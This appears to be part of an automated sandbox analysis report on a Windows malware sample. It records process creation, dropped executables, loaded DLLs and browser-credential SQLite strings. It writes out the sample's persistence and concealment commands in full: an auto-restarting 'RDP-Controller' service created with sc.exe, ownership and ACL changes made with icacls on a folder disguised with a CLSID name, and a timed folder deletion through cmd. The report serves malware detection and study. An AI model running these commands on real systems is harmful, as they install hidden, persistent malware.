Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3260:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6884:120:WilError_03
Source: C:\ProgramData\BFCAAEHJDB.exe File created: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\ProgramData\BFCAAEHJDB.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\BFCAAEHJDB.exe Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2340604993.000000001B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: file.exe, 00000000.00000003.2361745626.000000001B560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373150785.000000001B560000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: main.exe String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exe String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exe String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\Desktop\file.exe Process created: C:\ProgramData\BFCAAEHJDB.exe "C:\ProgramData\BFCAAEHJDB.exe"
Source: unknown Process created: C:\ProgramData\BFCAAEHJDB.exe C:\ProgramData\BFCAAEHJDB.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DAEGIDHDHIDG" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5012 -ip 5012
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 3212
Source: C:\ProgramData\BFCAAEHJDB.exe Process created: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ZsL2hKzmRChz.acl
Source: C:\Windows\System32\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 1524 -ip 1524
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1524 -s 1176
Source: C:\Users\user\Desktop\file.exe Process created: C:\ProgramData\BFCAAEHJDB.exe "C:\ProgramData\BFCAAEHJDB.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DAEGIDHDHIDG" & exit
Source: C:\ProgramData\BFCAAEHJDB.exe Process created: C:\ProgramData\BFCAAEHJDB.exe C:\ProgramData\BFCAAEHJDB.exe
Source: C:\ProgramData\BFCAAEHJDB.exe Process created: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5012 -ip 5012
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 3212
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 1524 -ip 1524
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1524 -s 1176
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ZsL2hKzmRChz.acl
Source: C:\Windows\System32\WerFault.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dbghelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sxs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: apphelp.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: version.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: winmm.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: d3d9.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: dwmapi.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: wldp.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: wtsapi32.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: winsta.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: version.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: winmm.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: d3d9.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: dwmapi.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: wldp.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: wtsapi32.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: winsta.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: mswsock.dll
Source: C:\ProgramData\BFCAAEHJDB.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Section loaded: rsaenh.dll
